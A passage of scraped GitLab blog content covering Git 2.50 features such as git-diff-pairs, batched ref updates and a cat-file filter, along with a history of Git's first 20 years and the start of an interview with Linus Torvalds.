1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f\n```\n\nWe can repeat this process for each of the filepairs, but spinning up a\nseparate Git process for each individual file diff is not very efficient.\nFurthermore, when using blob IDs, the diff loses some contextual information\nsuch as the change status, and file modes which are stored in with the parent\ntree object. What we really want is a mechanism to feed \"raw\" filepair info and\ngenerate the corresponding patch output.\n\nWith the 2.50 release, Git has a new built-in command named\n[`git-diff-pairs(1)`](https://git-scm.com/docs/git-diff-pairs). This command\naccepts \"raw\" formatted filepair info as input on stdin to determine exactly which patches to output. The following example showcases how this command could be\nused:\n\n```shell\n$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z\n```\n\nWhen used in this manner, the resulting output is identical to using `git-diff(1)`.\nBy having a separate command to generate patch output, the \"raw\" output from\n`git-diff-tree(1)` can be broken up into smaller batches of filepairs and fed to separate\n`git-diff-pairs(1)` processes. This solves the previously mentioned scalability\nconcern because diffs no longer have to be computed all at once. Future GitLab\nreleases could build upon this mechanism to improve diff\ngeneration performance, especially in cases where large change sets are\nconcerned. For more information on this change, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/20250228213346.1335224-1-jltobler@gmail.com/).\n\n_This project was led by [Justin Tobler](https://gitlab.com/justintobler)._\n\n## Batched reference updates\n\nGit provides the [`git-update-ref(1)`](https://git-scm.com/docs/git-update-ref)\ncommand to perform reference updates. When used with the `--stdin` flag,\nmultiple reference updates can be batched together in a single transaction by\nspecifying instructions for each reference update to be performed on stdin.\nBulk updating references in this manner also provides atomic behavior whereby a\nsingle reference update failure results in an aborted transaction and no\nreferences being updated. Here is an example showcasing this behavior:\n\n```shell\n# Create repository with three empty commits and branch named \"foo\"\n$ git init\n$ git commit --allow-empty -m 1\n$ git commit --allow-empty -m 2\n$ git commit --allow-empty -m 3\n$ git branch foo\n\n# Print out the commit IDs\n$ git rev-list HEAD\ncf469bdf5436ea1ded57670b5f5a0797f72f1afc\n5a74cd330f04b96ce0666af89682d4d7580c354c\n5a6b339a8ebffde8c0590553045403dbda831518\n\n# Attempt to create a new reference and update existing reference in transaction.\n# Update is expected to fail because the specified old object ID doesn’t match.\n$ git update-ref --stdin \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nfatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c\n\n# The \"bar\" reference was not created.\n$ git switch bar\nfatal: invalid reference: bar\n```\n\nCompared to updating many references individually, updating in bulk is also\nmuch more efficient. While this works well, there might be certain\ncircumstances where it is okay for a subset of the requested reference updates\nto fail, but we still want to take advantage of the efficiency gains of bulk\nupdates.\n\nWith this release, `git-update-ref(1)` has the new `--batch-updates` option,\nwhich allows the updates to proceed even when one or more reference updates\nfails. In this mode, individual failures are reported in the following format:\n\n```text\nrejected SP (\u003Cold-oid> | \u003Cold-target>) SP (\u003Cnew-oid> | \u003Cnew-target>) SP \u003Crejection-reason> LF\n```\n\nThis allows successful reference updates to proceed while providing context to\nwhich updates were rejected and for what reason. Using the same example\nrepository from the previous example:\n\n```shell\n# Attempt to create a new reference and update existing reference in transaction.\n$ git update-ref --stdin --batch-updates \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nrejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided\n\n# The \"bar\" reference was created even though the update to \"foo\" was rejected.\n$ git switch bar\nSwitched to branch 'bar'\n```\n\nThis time, with the `--batch-updates` option, the reference creation succeeded\neven though the update didn't work. This patch series lays the groundwork for\nfuture performance improvements in `git-fetch(1)` and `git-receive-pack(1)`\nwhen references are updated in bulk. For more information, check the\n[mailing-list thread](https://lore.kernel.org/git/20250408085120.614893-1-karthik.188@gmail.com/)\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## New filter option for git-cat-file(1)\n\nWith [`git-cat-file(1)`](https://git-scm.com/docs/git-cat-file), it is possible\nto print info for all objects contained in the repository via the\n`--batch–all-objects` option. For example:\n\n```shell\n# Setup simple repository.\n$ git init\n$ echo foo >foo\n$ git add foo\n$ git commit -m init\n\n# Create an unreachable object.\n$ git commit --amend --no-edit\n\n# Use git-cat-file(1) to print info about all objects including unreachable objects.\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ntree 205f6b799e7d5c2524468ca006a0131aa57ecce7\nblob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nIn some situations, a user might want to search through all objects in the\nrepository, but only output a subset based on some specified attribute. For\nexample, if we wanted to see only the objects that are commits, we could use\n`grep(1)`:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nWhile this works, one downside with filtering the output is that\n`git-cat-file(1)` still has to traverse all the objects in the repository, even\nthe ones that the user is not interested in. This can be rather inefficient.\n\nWith this release, `git-cat-file(1)` now has the `--filter` option, which only\nshows objects matching the specified criteria. This is similar to the option of\nthe same name for `git-rev-list(1)`, but with only a subset of the filters\nsupported. The supported filters are `blob:none`, `blob:limit=`, as well as\n`object:type=`. Similar to the previous example, objects can be filtered by\ntype with Git directly:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nNot only is it convenient for Git to handle the processing, for large\nrepositories with many objects, it is also potentially more efficient. If a\nrepository has bitmap indices, it becomes possible for Git to efficiently\nlookup objects of a specific type, and thus avoid scanning through the\npackfile, which leads to a significant speedup. Benchmarks conducted on the\n[Chromium repository](https://github.com/chromium/chromium.git) show\nsignificant improvements:\n\n```text\nBenchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]\n   Range (min … max):   73.936 s … 89.690 s    10 runs\n\nBenchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]\n   Range (min … max):    18.2 ms …  23.6 ms    127 runs\n\nBenchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]\n   Range (min … max):    1.541 s …  1.566 s    10 runs\n\nBenchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]\n   Range (min … max):   11.114 s … 11.245 s    10 runs\n\nBenchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]\n   Range (min … max):   62.836 s … 73.618 s    10 runs\n\nBenchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]\n   Range (min … max):   12.960 s … 13.199 s    10 runs\n\nSummary\n   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n```\n\nInterestingly, these results indicate that the computation time now scales with\nthe number of objects for a given type instead of the number of total objects\nin the packfile. The original mailing-list thread can be found\n[here](https://lore.kernel.org/git/20250221-pks-cat-file-object-type-filter-v1-0-0852530888e2@pks.im/).\n\n_This project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab)._\n\n## Improved performance when generating bundles\n\nGit provides a means to generate an archive of a repository which contains a\nspecified set of references and accompanying reachable objects via the\n[`git-bundle(1)`](https://git-scm.com/docs/git-bundle) command. This operation\nis used by GitLab to generate repository backups and also as part of the\n[bundle-URI](https://git-scm.com/docs/bundle-uri) mechanism.\n\nFor large repositories containing millions of references, this operation can\ntake hours or even days. For example, with the main GitLab repository\n([gitlab-org/gitlab](https://gitlab.com/gitlab-org/gitlab)), backup times were\naround 48 hours. Investigation revealed there was a performance bottleneck due\nto how Git was performing a check to avoid duplicated references being included\nin the bundle. The implementation used a nested `for` loop to iterate and\ncompare all listed references, leading to O(N^2) time complexity. This scales\nvery poorly as the number of references in a repository increases.\n\nIn this release, this issue was addressed by replacing the nested loops with a\nmap data structure leading to a significant speedup. The following benchmark\nthe performance improvement for creating a bundle with a repository containing\n100,000 references:\n\n```text\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s    10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]\n  Range (min … max):    2.364 s …  2.425 s    10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nTo learn more, check out our blog post\n[How we decreased GitLab repo backup times from 48 hours to 41 minutes](https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/).\nYou can also find the original mailing list thread\n[here](https://lore.kernel.org/git/20250401-488-generating-bundles-with-many-references-has-non-linear-performance-v1-0-6d23b2d96557@gmail.com/).\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## Better bundle URI unbundling\n\nThrough the [bundle URI](https://git-scm.com/docs/bundle-uri) mechanism in Git,\nlocations to fetch bundles from can be provided to clients with the goal to\nhelp speed up clones and fetches. When a client downloads a bundle, references\nunder `refs/heads/*` are copied from the bundle into the repository along with\ntheir accompanying objects. A bundle might contain additional references\noutside of `refs/heads/*` such as `refs/tags/*`, which are simply ignored when\nusing bundle URI on clone.\n\nIn Git 2.50, this restriction is lifted, and all references\nmatching `refs/*` contained in the downloaded bundle are copied.\n[Scott Chacon](https://github.com/schacon), who contributed this functionality,\ndemonstrates the difference when cloning\n[gitlab-org/gitlab-foss](https://gitlab.com/gitlab-org/gitlab-foss):\n\n```shell\n$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49\nCloning into 'gl2.49'...\nremote: Enumerating objects: 1092703, done.\nremote: Counting objects: 100% (973405/973405), done.\nremote: Compressing objects: 100% (385827/385827), done.\nremote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)\nReceiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.\nResolving deltas: 100% (710976/710976), completed with 9081 local objects.\nChecking objects: 100% (4194304/4194304), done.\nChecking connectivity: 959668, done.\nUpdating files: 100% (59972/59972), done.\n\n$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50\nCloning into 'gl-2.50'...\nremote: Enumerating objects: 65538, done.\nremote: Counting objects: 100% (56054/56054), done.\nremote: Compressing objects: 100% (28950/28950), done.\nremote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)\nReceiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.\nResolving deltas: 100% (27401/27401), completed with 8564 local objects.\nUpdating files: 100% (59972/59972), done.\n```\n\nComparing these results, we see that Git 2.50 fetches 43,887 objects\n(40.42 MiB) after the bundle was extracted whereas Git 2.49 fetches a\ntotal of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer\nobjects and 90% less data, which benefits both the client and the server. The\nserver needs to process a lot less data to the client and the client needs to\ndownload and extract less data. In the example provided by Scott this led to a\nspeedup of 25%.\n\nTo learn more, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/pull.1897.git.git.1740489585344.gitgitgadget@gmail.com/).\n\n_This patch series was contributed by [Scott Chacon](https://github.com/schacon)._\n\n## Read more\n\nThis article highlighted just a few of the contributions made by GitLab and\nthe wider Git community for this latest release. You can learn about these from\nthe [official release announcement](https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/) of the Git project. Also, check\nout our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/)\nto see other past highlights of contributions from GitLab team members.\n","2025-06-16",[983,900,267],{"featured":91,"template":789,"slug":1060},"what-s-new-in-git-2-50-0",{"content":1062,"config":1071},{"title":1063,"description":1064,"authors":1065,"heroImage":1067,"date":1068,"body":1069,"category":747,"tags":1070},"Journey through Git's 20-year history","Follow along as we reminisce about the first commit, the unique aspects of the earliest releases, and the confusion sparked by an update to the git-push(1) default behavior.",[1066],"Patrick Steinhardt","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097380/Blog/Hero%20Images/Blog/Hero%20Images/git-20-years-opt2_TWNsNk8KH43b3jP0KLD0U_1750097380123.png","2025-04-14","The Git project has just turned 20 years old. A lot has happened during these years, and while the conceptual design of Git hasn't changed significantly since its inception, the way users interact with the tool has changed quite significantly. We at GitLab are proud to build on top of this critical piece of software and to be part of its history.\n\nJoin us on a journey through Git's history to explore how it has evolved over the years.\n\n## The first commit\n\nThe first commit was made on April 7, 2005, by Linus Torvalds, the creator of the Linux kernel: `e83c5163316 (Initial revision\nof \"git\", the information manager from hell, 2005-04-07)`.\n\nAs we can see, this\ncommit does not contain a lot of files:\n\n```shell\n$ git ls-tree e83c5163316\n100644 blob a6bba79ba1f46a1bbf7773449c3bd2bb9bf48e8b\tMakefile\n100644 blob 27577f76849c09d3405397244eb3d8ae1d11b0f3\tREADME\n100644 blob 98a32a9ad39883c6d05a000a68511d4b1ee2b3c7\tcache.h\n100644 blob 74a0a234dd346fff51c773aa57d82fc4b83a8557\tcat-file.c\n100644 blob 840307af0cfaab31555795ce7175d5e9c9f981a0\tcommit-tree.c\n100644 blob 25dc13fe101b219f74007f3194b787dd99e863da\tinit-db.c\n100644 blob c924a6e0fc4c36bad6f23cb87ee59518c771f936\tread-cache.c\n100644 blob 1b47742d8cbc0d98903777758b7b519980e7499e\tread-tree.c\n100644 blob b8522886a15db861508fb6d03d4d88d6de912a4b\tshow-diff.c\n100644 blob 5085a5cb53ee52e1886ff6d46c609bdb2fc6d6cd\tupdate-cache.c\n100644 blob 921f981353229db0c56103a52609d35aff16f41b\twrite-tree.c\n```\n\nIn addition to build infrastructure, the first commit provides seven top-level commands:\n\n- `init-db` to initialize a new Git repository\n- `update-cache` to add files to the index\n- `write-tree` to take what is in the index and create a new tree from it\n- `read-tree` to read a tree object\n- `commit-tree` to create a commit from a tree\n- `cat-file` to read a specific object into a temporary file\n\nNote that the `git` command itself did not yet exist at this point in time.\nInstead, these commands had to be executed directly.\n\nAs example, let's create a\nnew repository:\n\n```shell\n$ mkdir repo\n$ cd repo\n$ init-db\ndefaulting to private storage area\n$ ls -a\n.  ..  .dircache\n```\n\nThat looks quite unfamiliar: There is no `.git` directory, but there is a\n`.dircache` directory. And where was the private storage area?\n\nThe early design of Git distinguished between a \"shared\" and \"private\" object\nstorage area. This object storage area was where all of your Git objects went. For example, your\ncommits and blobs.\n\nBy default, `init-db` created a private object storage area that was only used for\nthe managed directory that it was created in. A \"shared\" object storage area, on\nthe other hand, shared object content across multiple managed directories so\nthat the same object did not need to be stored twice.\n\n### Create a commit\n\nSo, now that we have a repository, how did we create a commit? Well, it isn't as\neasy as today's `git add . && git commit`. Instead, you had to:\n\n1. Update the index by calling `update-cache` for every file that you want to\n   add.\n1. Write a new tree by calling `write-tree`, which takes everything you have\n   added to the index.\n1. Set up environment variables to tell Git who you are.\n1. Write a commit object by calling `commit-tree`.\n\nLet’s create a commit in the repository:\n\n```shell\n$ echo content-1 >file-a\n$ update-cache file-a\n$ echo content-2 >file-b\n$ update-cache file-b\n$ write-tree\n3f143dfb48f2d84936626e2e5402e1f10c2050fb\n$ export COMMITTER_NAME=\"Patrick Steinhardt\"\n$ export COMMITER_EMAIL=ps@pks.im\n$ echo \"commit message\" | commit-tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nCommitting initial tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\n5f8e928066c03cebe5fd0a0cc1b93d058155b969\n```\n\nThis isn't exactly ergonomic, but it works! Let's have a look at the generated\ncommit:\n\n```shell\n$ cat-file 5f8e928066c03cebe5fd0a0cc1b93d058155b969\ntemp_git_file_rlTXtE: commit\n$ cat temp_git_file_rlTXtE\ntree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nauthor Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\ncommitter Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\n\ncommit message\n```\n\nNote that `cat-file` didn't print the contents directly, but instead wrote\nit into a temporary file first. But the contents of the file looked exactly how a\nmodern commit would look.\n\n### Making changes\n\nNow that we have files, how do we get their status? You might have guessed it:\nthis could be done with `show-diff`:\n\n```shell\n$ show-diff\nfile-a: ok\nfile-b: ok\n\n$ echo modified-content >file-a\n$ show-diff\n--- -\t2025-03-26 13:14:53.457611094 +0100\n+++ file-a\t2025-03-26 13:14:52.230085756 +0100\n@@ -1 +1 @@\n-content-1\n+modified-content\nfile-a:  46d8be14cdec97aac6a769fdbce4db340e888bf8\nfile-b: ok\n```\n\nAmazingly, `show-diff` even knew to already generate diffs between the old and\nnew state of modified files! Funny enough though, Git achieved this by simply\nexecuting the diff(1) Unix tool.\n\nIn summary, all of this was still rather bare-bones, but it performed all of the\nnecessary duties to track history. There were still many limitations:\n\n- There was no easy way yet to switch between commits.\n- There was no way to show logs.\n- There were no branches, tags, or even references. Users were expected to manually\n  keep track of object IDs.\n- There was no way to synchronize two repositories with one another. Instead,\n  users were expected to use rsync(1) to synchronize the `.dircache` directories.\n- There was no way to perform merges.\n\n## Git 0.99\n\nThe first test release of Git was Version 0.99. This release came only two months after\nthe initial commit, but already contained 1,076 commits. There had been almost 50\ndifferent developers involved. The most frequent committer at this point was\nLinus himself, but he was closely followed by Junio Hamano, the current maintainer.\n\nA lot of things had changed since the initial commit:\n\n- Git started to track different development branches by using references, which\n  in most cases removes the need to manually track object IDs.\n- There was a new remote protocol that allows two repositories to exchange\n  objects with one another.\n- The `.dircache` directory was renamed to `.git`.\n- It became possible to merge single files with one another.\n\nThe most important visible change, though, was the introduction of\nthe top-level `git` command and its subcommands. Interestingly, this release\nalso created the notion of \"plumbing\" and \"porcelain\" commands:\n\n- \"Plumbing\" tools are the low-level commands that access the underlying Git\n  repository.\n- \"Porcelain\" tools are shell scripts that wrap the plumbing commands to provide\n  a nicer, high-level user interface.\n\nThis split still exists nowadays as documented in\n[`git(1)`](https://git-scm.com/docs/git#_high_level_commands_porcelain), but because \nmost porcelain tools have been rewritten from shell scripts to C, the line between these two\ncategories has started to blur significantly.\n\n## Linus hands over maintainership\n\nLinus never started Git out of love for version control systems, but because there was a need to replace BitKeeper for Linux kernel development. As such, he never planned to keep maintaining Git forever. The intent was to maintain it until someone trustworthy stepped up.\n\nThat someone was Junio Hamano. Junio got involved in Git about a week after Linus’s first commit and already had a couple of hundred commits in the history after the Git 0.99 release. So, on July 26, 2005, [Linus made Junio the new maintainer of the Git project](https://lore.kernel.org/git/Pine.LNX.4.58.0507262004320.3227@g5.osdl.org/). While Linus has continued to contribute to Git, his involvement with the project faded over time, which is only natural considering that he is quite busy as head of the Linux project.\n\nJunio is still leading the Git project today.\n\n## Git 1.0\n\nThe first major release of Git happened on December 21, 2005, by\nJunio. Interestingly enough, there had been 34 releases between Version 0.99\nand Version 1.0: 0.99.1 to 0.99.7, 0.99.7a to 0.99.7d, 0.99.8 to 0.99.8g, and\n0.99.9 up to 0.99.9n.\n\nOne of the more important milestones since 0.99 was probably the addition of the `git-merge(1)`\ncommand that allows one to merge two trees with one another. This is in stark\ncontrast to before, where one had to basically script the merges file by file.\n\n### Remotes\n\nAnother significant change was the introduction of shorthand notation for\nremote repositories. While Git already knew how to talk to remote repositories,\nusers always had to specify the URL to fetch from every single time they wanted\nto fetch changes from it. This was quite unfriendly to the users, because, typically, they wanted to interact with the same remote over and over again.\n\nYou may know about how remotes work now, but the mechanism that existed at  \nthis point in time was still significantly different. There was no `git-remote(1)`  \ncommand that you could use to manage your remotes. Remotes weren't even stored  \nin your `.git/config` file. In fact, when remotes were first introduced in  \nVersion 0.99.2, Git didn't even *have* config files.\n\nInstead, you had to configure remotes by writing a file into the  \n`.git/branches` directory, which nowadays feels somewhat counterintuitive. But  \nthe mechanism still works today:\n\n```shell\n$ git init repo --\nInitialized empty Git repository in /tmp/repo/.git/\n$ cd repo\n$ mkdir .git/branches\n$ echo https://gitlab.com/git-scm/git.git >.git/branches/origin\n$ git fetch origin refs/heads/master\n```\n\nBut that isn't all! The directory was soon renamed in Git Version 0.99.5 to \"remotes\", so there are a total of three different ways to configure remotes in a modern Git client.\n\nMost of you have probably never used either `.git/branches` nor `.git/remotes`,  \nand both of these mechanisms have been deprecated since 2005 and 2011,  \nrespectively. Furthermore, these directories will finally be removed in Git 3.0.\n\n## Git branding\n\nIn 2007, the first Git logo was created. It’s arguable if you can call it a logo, because it only consisted of three red minus signs above three green plus signs, reflecting what the output of `git diff` looks like:\n\n![three red minus signs above three green plus signs, reflecting what the output of `git diff`](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097387927.png)\n\nA bit later, in 2008, the website [git-scm.com](https://git-scm.com) was launched:\n\n![landing page for git-scm.com in 2006](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image4_aHR0cHM6_1750097387930.png)\n\nIn 2012, the Git website was [revamped](https://lore.kernel.org/git/CAP2yMaJy=1c3b4F72h6jL_454+0ydEQNXYiC6E-ZeQQgE0PcVA@mail.gmail.com/) by Scott Chacon and Jason Long. It looks pretty similar to how it looks today:\n\n![git website revamped in 2012](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097387932.png)\n\nThis site redesign sports the new red-orange logo designed by Jason Long; the same logo that's currently used:\n\n![git logo](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097387934.png)\n\n## Git 2.0\n\nGit already started to look a lot like modern Git at the 1.0 release, so we\nare going to do a big historical jump to Git 2.0. This version was\nreleased around 10 years after Git 1.0 and was the first release that\nintentionally contained backwards-incompatible changes in central workflows.\n\n### `git-push(1)` default behavior\n\nThe change that arguably caused most the confusion in this release was the\nupdated default behavior of `git-push(1)`.\n\nThere are a couple of different actions that Git could take when you push\ninto a remote repository and don’t specify exactly what you want to push:\n\n- Git could refuse to do anything, asking you to provide more information of\n  what exactly you want to push.\n- Git could push the currently checked out branch.\n- Git could push the currently checked out branch, but only if it knows that it\n  has an equivalent on the remote side.\n- Git could push all of your branches that have an equivalent on the remote side.\n\nThe behavior of modern Git is the so-called \"simple\" strategy, which is the third\noption above. But before Git 2.0, the default behavior was the \"matching\"\nstrategy, which is the last option.\n\nThe “matching” strategy was significantly more risky. You always had to make sure that you\nwere fine with pushing all of your local branches that have an equivalent on the\nremote side before pushing. Otherwise, you might have ended up\npushing changes unintentionally. As such, it was decided to change the strategy\nto \"simple\" to reduce the risk and help out Git beginners.\n\n### `git-add(1)`\n\nAnother big change was the default behavior of `git-add(1)` when it comes to  \ntracked files that have been deleted. Before Git 2.0, `git-add(1)` wouldn't  \nstage deleted files automatically, but you instead had to manually add each  \ndeleted file by using `git-rm(1)` to make them part of a commit. With Git 2.0, this behavior was changed so that `git-add(1)` also adds deleted files to the index.\n\n## Celebrating the Git community\n\nI won’t bore you with the details around how Git works nowadays – you probably use it daily anyway, and, if you don’t, there are many tutorials out there that can help you get started. Instead, let’s celebrate the Git community, which has ensured that Git works as well as it does 20 years later.\n\nOver time, Git has:\n\n- Accumulated 56,721 commits as of the Git 2.49 release.\n- Received contributions from more than 2,000 different individuals.\n- Published 60 major releases.\n\nThe Git project also has a steady influx of new contributors by taking part in [Google Summer of Code](https://summerofcode.withgoogle.com/) and [Outreachy](https://www.outreachy.org/). New contributors like these are what will ensure that the Git project will remain healthy in the long term.\n\nAs such, let me extend a big thank you to all contributors. It is your contributions that have made Git possible.\n\n## Going forward\n\nIt should be an uncontroversial take to say that Git has essentially won the competition of version control systems. It has significant market share, and it isn't easy to find open source projects that are using a version control system other than Git. So it has clearly done a lot of things right.\n\nThat being said, its development hasn't stood still, and there are still many challenges ahead of Git. On the one hand, we have technical challenges:\n- modernization of an aging code base  \n- scaling with the ever-growing size of monorepos  \n- handling large binary files better\n\nAnd on the other hand, there are problems of a more social type:\n- improving the usability of Git  \n- fostering the Git community so that the project remains healthy in the long  \n  term\n\nThere always remains work to be done and we at GitLab are proud to be part  \nof these efforts to make sure that Git continues to be a great version control  \nsystem for the next 20 years.\n\n## Read more about Git\n\n- [Celebrating Git's 20th anniversary with creator Linus Torvalds](https://about.gitlab.com/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds/)\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)",[900,983],{"slug":1072,"featured":91,"template":789},"journey-through-gits-20-year-history",{"content":1074,"config":1082},{"title":1075,"description":1076,"authors":1077,"heroImage":1078,"date":1079,"body":1080,"category":747,"tags":1081},"Celebrating Git's 20th anniversary with creator Linus Torvalds","Discover the origins of the open-source version control system, why he handed over the reins a few months in, and what he thinks about adding new programming languages to Git.",[1066],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662510/Blog/Hero%20Images/git-20-years-opt1.png","2025-04-07","The Git version control system was first released on April 7, 2005, by the father of the Linux kernel, Linus Torvalds. To mark the 20th anniversary of this important project that is nowadays used by almost every single developer, I interviewed Linus about the history of Git, why he handed over maintainership of Git, and what he considers to be its most important milestones.\n\n**In 2005, you were already the maintainer of the thriving Linux kernel. Why did you decide to start a new version control system?**\n\nSo, I got into it from really despising version control.\n\nI had used the traditional version control systems (CVS/RCS/SCCS) both as an end user (i.e., tracking open source projects like [GCC](https://gcc.gnu.org/)) and as a developer (we used CVS at Transmeta for everything) and absolutely hated the experience with a passion.\n\n\u003Cimg src=\"https://about.gitlab.com/images/blogimages/linustorvalds.png\" align=\"left\" width=\"200px\" style=\"padding-right: 20px; padding-bottom: 10px\"/>\n\nAnd yes, back then most projects that used CVS had probably moved to [SVN](https://subversion.apache.org/), but honestly, I always felt that SVN was just \"lipstick on a pig.\" It was just CVS in another form, with some UI improvements, but none of the fundamentals fixed, and a few new problems added.\n\nThe problems with CVS and its ilk are too many to even list, and, happily, they have largely become irrelevant and younger developers have probably never even had to deal with any of it. I absolutely refused to deal with it for the kernel, even though a few subsystems (notably the networking side) were actually using CVS to track their code back in the '90s.\n\nAnyway, back then I lived in the Bay Area, and Larry McVoy, who I knew from other projects (mainly [lmbench](https://www.usenix.org/legacy/publications/library/proceedings/sd96/full_papers/mcvoy.pdf)), had started BitMover, which had a new version control model called BitKeeper, or BK, for short.\n\nBK wasn't open source, but Larry liked open source projects and really felt that the lack of version control was holding the kernel back. He wasn't wrong, but the traditional source code managers (SCMs) really didn't work for me at all. Larry spent some time showing me and David Miller (networking maintainer and existing CVS user) what BitKeeper could do.\n\nBK wasn't perfect, and it was based on Source Code Control System (SCCS) like so many other traditional SCMs were, and thus had the same broken \"history per file\" model that everybody else had, and that causes huge and fundamental issues with file renaming and deletion.\n\nBut BK also wasn't just that \"lipstick\" thing. It may have used SCCS at a low level, but on a higher level it fixed some really fundamental things, and did proper distributed development, and had a real global – not per-file – history that made merging code from different trees actually work.\n\nWith CVS, creating branches and merging them was something you had to plan and discuss with people, and were major events. With BK, every repository was a branch. We take that for granted now, and Git obviously took it much further by having many branches *per* repository, but even the much more limited BK model was really a big deal at the time.\n\nAgain, BK wasn't perfect. As mentioned, it did do per-file history, which really is a big fundamental problem that makes renaming and file merging simply not work reliably, and inevitably causes chaos and pain (for CVS people, think Attic, shudder). And it had some scalability issues, too, but those took a while to become more than a bit problematic.\n\nBut the biggest problem with BK was the licensing, and while over the years (we used BK from 2002 to 2005) a lot of kernel maintainers did end up switching over to it, it was always a bit of a friction point. And that friction came to a head in late 2004, and the use of BK for the kernel basically 